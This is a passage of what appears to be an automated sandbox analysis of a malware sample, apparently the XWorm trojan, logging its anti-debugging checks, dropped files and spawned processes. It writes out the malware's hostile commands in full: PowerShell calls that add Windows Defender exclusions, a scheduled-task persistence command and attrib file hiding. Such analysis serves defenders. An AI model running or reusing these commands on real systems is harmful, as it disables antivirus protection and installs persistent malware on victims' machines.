                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376Thread sleep count: 3623 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\System User.exe TID: 7908Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\System User.exe TID: 8180Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\System User.exe TID: 3716Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\System User.exe TID: 5940Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\System User.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\System User.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\System User.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\System User.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5883B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7FF5883B0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5892F0 FindFirstFileExW,FindClose,0_2_00007FF7FF5892F0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7FF5A18E4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5892F0 FindFirstFileExW,FindClose,2_2_00007FF7FF5892F0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5A18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7FF5A18E4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5883B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7FF5883B0
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599804Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599683Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599578Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599468Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599354Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599234Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599125Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599015Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598906Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598742Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598632Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598515Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598406Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598295Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598187Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598078Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 597949Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 597844Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 597734Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 597578Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 597176Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596916Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596764Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596647Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596510Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596400Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596281Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596168Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596062Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595952Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595843Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595734Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595619Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595511Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595390Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595281Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595171Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595062Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594951Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594799Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594672Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594531Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594323Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594075Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593969Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593859Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593749Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593640Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593531Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593418Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593306Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593187Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593059Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\System User.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\System User.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\System User.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\System User.exeThread delayed: delay time: 922337203685477
                      Source: msedge.exe, 0000000C.00000002.2742589628.0000000002601000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: msedge.exe, 0000000C.00000002.2749735501.000000001B481000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: dddd.exe, 0000000E.00000002.1727415160.0000026232500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXX
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeCode function: 12_2_00007FFB49897A81 CheckRemoteDebuggerPresent,12_2_00007FFB49897A81
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF59A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7FF59A684
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A34F0 GetProcessHeap,0_2_00007FF7FF5A34F0
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\System User.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\System User.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF58C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7FF58C910
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF59A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7FF59A684
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF58D37C SetUnhandledExceptionFilter,0_2_00007FF7FF58D37C
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF58D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7FF58D19C
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF58C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF7FF58C910
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF59A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7FF59A684
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF58D37C SetUnhandledExceptionFilter,2_2_00007FF7FF58D37C
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF58D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7FF58D19C
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB6137D0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBBB6137D0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB613210 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBBB613210
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB63A96C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBBB63A96C
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBB639F40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBBB639F40
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FFBBCD50E08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBBCD50E08
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: Process Memory Space: dddd.exe PID: 6476, type: MEMORYSTR
                      Source: Yara matchFile source: \Device\ConDrv, type: DROPPED
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe'
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\System User.exe'
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\System User.exe'Jump to behavior
                      Bypasses PowerShell execution policy
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe'
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Users\user\Desktop\YgJ5inWPQO.exe "C:\Users\user\Desktop\YgJ5inWPQO.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\msedge.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\dddd.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Local\Temp\msedge.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Local\Temp\dddd.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msedge.exe C:\Users\user\AppData\Local\Temp\msedge.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\dddd.exe C:\Users\user\AppData\Local\Temp\dddd.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\System User.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /allJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
                      Source: msedge.exe, 0000000C.00000002.2742589628.000000000266F000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2742589628.0000000002678000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: msedge.exe, 0000000C.00000002.2742589628.000000000266F000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2742589628.0000000002678000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: msedge.exe, 0000000C.00000002.2742589628.000000000266F000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2742589628.0000000002678000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: msedge.exe, 0000000C.00000002.2742589628.000000000266F000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2742589628.0000000002678000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2{
                      Source: msedge.exe, 0000000C.00000002.2742589628.000000000266F000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2742589628.0000000002678000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A95E0 cpuid 0_2_00007FF7FF5A95E0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformationJump to behavior
